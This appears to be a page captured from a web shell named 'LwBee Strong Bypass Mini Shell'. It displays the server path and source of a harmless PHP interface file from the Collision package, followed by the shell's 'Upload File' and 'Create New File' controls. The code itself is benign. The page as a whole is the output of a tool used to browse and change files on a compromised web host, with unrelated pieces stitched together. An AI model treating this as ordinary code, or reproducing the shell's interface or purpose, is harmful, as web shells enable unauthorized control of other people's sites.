/home/aloic1/public_html/core/vendor/nunomaduro/collision/src/Contracts/Highlighter.php
<?php

declare(strict_types=1);

namespace NunoMaduro\Collision\Contracts;

/**
 * @internal
 */
interface Highlighter
{
    /**
     * Highlights the provided content.
     */
    public function highlight(string $content, int $line): string;
}
@LwBee Strong Bypass

LwBee Strong Bypass Mini Shell

Upload File

Create New File